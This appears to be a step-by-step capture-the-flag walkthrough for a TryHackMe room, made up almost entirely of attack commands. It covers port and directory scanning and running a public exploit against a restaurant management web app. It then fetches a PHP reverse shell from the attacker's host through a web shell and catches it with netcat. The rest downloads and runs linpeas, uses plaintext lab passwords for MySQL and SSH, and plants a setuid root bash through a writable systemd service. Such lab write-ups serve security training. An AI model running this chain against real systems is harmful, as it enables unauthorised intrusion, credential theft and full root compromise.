Zeno
Room Link: https://tryhackme.com/room/zeno
Scans
Initial scan
Kali
nmap -A $VICTIM
Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/12340- HTTP
Kali
gobuster dir -u http://$VICTIM:12340 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Restaurant Management System Exploit
Exploit: https://www.exploit-db.com/raw/47520
The code needed some fixing up
From
To
Kali
python exploit.py http://$VICTIM:12340/rms/
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php Kali
python2 -m SimpleHTTPServer 81Browser
http://$VICTIM:12340/rms/images/reverse-shell.php?cmd=curl%20-O%20http://10.10.57.58:81/php-reverse-shell.phpKali
nc -lvnp 1337Browser
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgLinPeas
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81Victim
cd /tmp/
curl -O http://$KALI:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
MySQL
Victim
mysql -u root -pveerUffIrangUfcubyigVictim(mysql)
show databases;
use dbrms;
show tables;
select * from members;
Edwards password was still not found
I went back to linpeas and found another password, it's for a different user but it still worked.
TCP/22- SSH
Kali
ssh edward@$VICTIM
Password: FrobjoodAdkoonceanJaVictim(edward)
sudo -l
Victim(apache)
find /etc -type f -perm /g=w -exec ls -l {} + 2> /dev/null 
Victim(apache)
vi /etc/systemd/system/zeno-monitoring.serviceFrom
To
[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/edward/bash_root; chmod +xs /home/edward/bash_root'
[Install]
WantedBy=multi-user.target
Victim(edward)
sudo /usr/sbin/rebootKali
ssh edward@$VICTIM
Password: FrobjoodAdkoonceanJaVictim(edward)
ls -lah
./bash_root -p
Last updated